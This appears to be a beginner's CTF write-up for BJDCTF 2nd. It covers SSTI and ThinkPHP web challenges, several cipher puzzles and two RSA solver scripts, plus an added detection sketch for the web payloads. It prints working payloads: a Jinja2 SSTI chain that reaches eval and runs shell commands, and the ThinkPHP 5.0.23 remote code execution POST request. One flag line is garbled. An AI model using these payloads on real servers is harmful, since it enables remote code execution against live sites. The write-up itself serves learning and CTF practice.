BJDCTF-WP

BJDCTF 2nd WP

Introduction

  • I did not have much time to play, and I am still a beginner, so I only solved a few challenges. Here is a write-up to share them.

[BJDCTF 2nd]fake google

Knowledge Point: SSTI

  • I have practiced this type a lot recently, so this was the first Web challenge I solved. It again tests SSTI in the Flask framework. There is not much to it, apart from a small trick when reading the flag at the end: the file has to be read through base64.
  • I used warnings.catch_warnings to reach eval and execute commands. The gadget that is most commonly used did not seem to be available, so I looked for this one instead.
  • As usual, first use {{[].__class__.__mro__[1].__subclasses__()}} to list the subclasses of the base class, then use Ctrl+F to find a usable one.
    After finding it, it turned out that index() could not be used directly to look up its position, so I copied the output out and found the index to be 169, then:
    {{''.__class__.__mro__[1].__subclasses__()[169].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("whoami").read()')}}
    This executed successfully.
  • The rest is command execution: traverse the directories and read the flag. One thing worth mentioning: when reading the flag, the file contents were filtered, so it is read through base64:
    {{''.__class__.__mro__[1].__subclasses__()[169].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("echo cat / flag | base64").read()')}}
  • Finally, decode the output to get the flag.

[BJDCTF 2nd]old-hack

Knowledge Point: ThinkPHP 5.0.23 RCE

  • The home page of this challenge already gives the hint: it displays "Powered by THINKPHP5", which points directly to the ThinkPHP 5 vulnerabilities. Searching for an existing exp and using it is enough.
# ThinkPHP <= 5.0.23, 5.1.0 <= 5.1.16; requires the framework's app_debug to be enabled
POST /
_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls -al

This executes successfully; the flag can then be read directly from the root directory.
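
From the defending side, both web payloads above have a recognisable shape in request parameters: a Jinja2 expression that walks dunder attributes, and a `_method=__construct` override combined with `filter[...]`. The following detection sketch is an added example, not part of the original write-up; the rule names, the `name` parameter and the sample requests are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, quote, unquote_plus

# Attributes used to walk from a literal to builtins in the Jinja2 payloads above.
SSTI_DUNDERS = ("__class__", "__mro__", "__subclasses__", "__globals__", "__builtins__")
TEMPLATE_EXPR = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)

def decode_repeatedly(value, rounds=3):
    """URL-decode up to `rounds` times so double-encoded payloads are still seen."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(query="", body=""):
    """Return the names of the rules triggered by a request's parameters."""
    pairs = parse_qsl(query, keep_blank_values=True) + parse_qsl(body, keep_blank_values=True)
    pairs = [(decode_repeatedly(k), decode_repeatedly(v)) for k, v in pairs]
    hits = set()
    for _, value in pairs:
        # Rule 1: a template expression that touches a dunder attribute.
        for expr in TEMPLATE_EXPR.findall(value):
            if any(d in expr for d in SSTI_DUNDERS):
                hits.add("jinja2-ssti-object-walk")
    # Rule 2: ThinkPHP 5 method override to __construct combined with filter[...].
    override = any(k == "_method" and v == "__construct" for k, v in pairs)
    if override and any(k.startswith("filter") for k, _ in pairs):
        hits.add("thinkphp5-construct-filter")
    return hits

# Constructed sample requests (query string, form body); "name" is an assumed parameter.
SAMPLES = [
    ("name=" + quote("{{[].__class__.__mro__[1].__subclasses__()}}"), ""),
    ("", "_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls -al"),
    ("name=" + quote("{{ user.name }}"), "_method=PUT"),
]

def run_samples():
    return [sorted(classify(q, b)) for q, b in SAMPLES]

if __name__ == "__main__":
    for sample, result in zip(SAMPLES, run_samples()):
        print(result or ["clean"], sample)
```

The third sample shows that an ordinary template expression and an ordinary `_method=PUT` override do not trigger either rule.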

[BJDCTF 2nd] old illiterate

Knowledge Point: brain teaser

  • This one adds a brain-teaser trap: search for the text directly and read it out phonetically to find the clue. Finally, when submitting the flag, remember to delete the words that stand for the braces.
    flag: BJD {Zhe Jiu raincoat embroidery Lai Copernicium Zhijie pride shad Ba}

[BJDCTF 2nd]cat_flag

Knowledge point: Binary string

  • I did not get it at first. Then I tried treating a chicken as 0 and no chicken as 1, turning the picture into a binary string of 0s and 1s, and then converting that to ASCII.

[BJDCTF 2nd] spirit proficiency in -y1ng

Knowledge Point: variant pigpen cipher

  • A variant of the pigpen cipher; just decode it by looking up the code table.

[BJDCTF 2nd] Yan Yan Yan language -y1ng

Knowledge Point: Hex, Vigenère cipher

  • First convert the hex to a string, then decrypt it with Vigenère; the key is yanzi.

[BJDCTF 2nd]Y1nglish-y1ng

Knowledge Point: Substitution cipher

  • Decrypting it directly with an online tool did not give an accepted flag. The challenge author then released a final hint saying that the misspelled word should be corrected, after which the last word turned out to be Cr4ck.

[BJDCTF 2nd]rsa0

Knowledge Point: basic RSA routine, junior high school mathematics

  • Substitution of equal quantities: p+q and p-q are known, so we convert them into n and phi, compute the inverse element d, and finally solve for m.
  • exp:
# -*- coding:utf-8 -*-
# Author : Konmu
# rsa0

import gmpy2
from Crypto.Util.number import *
#a=p+q b=p-q
a=17162353559144679042138764130392599487619616736304807356650753313511074468547740997240459020330637407607018451370757739841162760390979956823381951345720928
b=2157944102411263994709908806124613607462762078172843352748093273937884682449698667594757978254948952712563313245682739933249064978139449404711197573108846
c=45301241949589301995180160804303973330820405560962297548184980689249607707456658111351805771592837881785351326731109851752124118781776273507359216672384415019593182742168977641581393719509221130849808495779942628017133428896872236441436256500653209906562574669595813780702154561337014309513479940699909759454
e=13881611

# n = p*q = ((p+q)**2 - (p-q)**2) / 4
n=(a**2-b**2)//4

# phi = (p-1)*(q-1) = n - (p+q) + 1
phi=n-a+1

d=int(gmpy2.invert(e,phi))

m=pow(c,d,n)

print(long_to_bytes(m))

[BJDCTF 2nd]rsa1

Knowledge Point: ditto

  • It is still the same substitution of equal quantities.
  • exp:
# -*- coding:utf-8 -*-
# Author : Konmu
# rsa1

from gmpy2 import iroot,invert
from Crypto.Util.number import *

#p**2+q**2=a
a=230282632694523225937051344416173208141003770756289612804807217657804068791542651564838194212104676551997764018460879226166807005433546876007288091996196539309119708193341213288590014759087592722749150747027103386853090111834756105787095305838589646731702172385691220203268855509181738201501713929481838642498
#p-q=b
b=-4900116095386312405990409603053751102044890401512310635193158977344509279780138297206939893571426574257123980641762453196916366832983541826491201092272814
c=57305478781873469701906886706515374864936174293678370148185292603092343152208523838764818066602190494238364695329068029056956741411335604426893391963871703874286120587046383783936896139251516197205626486457338063805605931966769630762887820549045989322171833789694041829203743398401975653722227935420397574254
e=8671291

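# (p-q)**2 = p**2 + q**2 - 2*p*q, so n = p*q = (a - b**2) / 2
n=(b**2-a)//(-2)
# (p+q)**2 = p**2 + q**2 + 2*p*q = a + 2*n
temp=2*n+a
# iroot returns (root, is_exact); keep only the integer root, which is p+q
temp_1,exact=iroot(temp,2)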
#temp_1=20893877754997573728203567845738001284961182394065350971204621396499968057878195283639697317876340959595444095705767445958979789899779232673349184190305080
print(temp_1)
phi=n-temp_1+1
d=int(invert(e,phi))
m=pow(c,d,n)

print(long_to_bytes(m))
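
The two substitutions used in rsa0 and rsa1, written as checked functions and verified with an encrypt/decrypt round trip. This is an added example, not the author's script; the function names and the toy primes are constructed for illustration and are not the challenge values.

```python
from math import isqrt

def from_sum_and_diff(s, d):
    """rsa0 case: s = p+q, d = p-q. Returns (n, phi)."""
    n, rem = divmod(s * s - d * d, 4)      # (p+q)^2 - (p-q)^2 = 4pq
    if rem:
        raise ValueError("s and d are not the sum and difference of two integers")
    return n, n - s + 1                    # phi = pq - (p+q) + 1

def from_squares_and_diff(a, d):
    """rsa1 case: a = p^2+q^2, d = p-q (sign does not matter). Returns (n, phi)."""
    n, rem = divmod(a - d * d, 2)          # p^2+q^2 - (p-q)^2 = 2pq
    s = isqrt(a + 2 * n)                   # (p+q)^2 = p^2+q^2 + 2pq
    if rem or s * s != a + 2 * n:
        raise ValueError("a and d are inconsistent")
    return n, n - s + 1

def decrypt(c, e, n, phi):
    """Textbook RSA decryption with d = e^-1 mod phi (Python 3.8+)."""
    return pow(c, pow(e, -1, phi), n)

# Constructed toy parameters (not the challenge values).
P, Q, E = 1000003, 999983, 65537
M = int.from_bytes(b"flag", "big")

def round_trip():
    c = pow(M, E, P * Q)
    n0, phi0 = from_sum_and_diff(P + Q, P - Q)
    n1, phi1 = from_squares_and_diff(P * P + Q * Q, Q - P)   # negative difference, as in rsa1
    return decrypt(c, E, n0, phi0), decrypt(c, E, n1, phi1)

if __name__ == "__main__":
    print([m.to_bytes(4, "big") for m in round_trip()])
```

Any leaked pair of symmetric functions of p and q is enough to recover phi without factoring n, which is why such values must never be exposed alongside a ciphertext.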

Summary

  • I originally intended to use this opportunity to practice web challenges, but found that I am still too weak (tcl). After the official WP comes out, I will follow up and learn some of the web routines from it.

Origin www.cnblogs.com/Konmu/p/12549038.html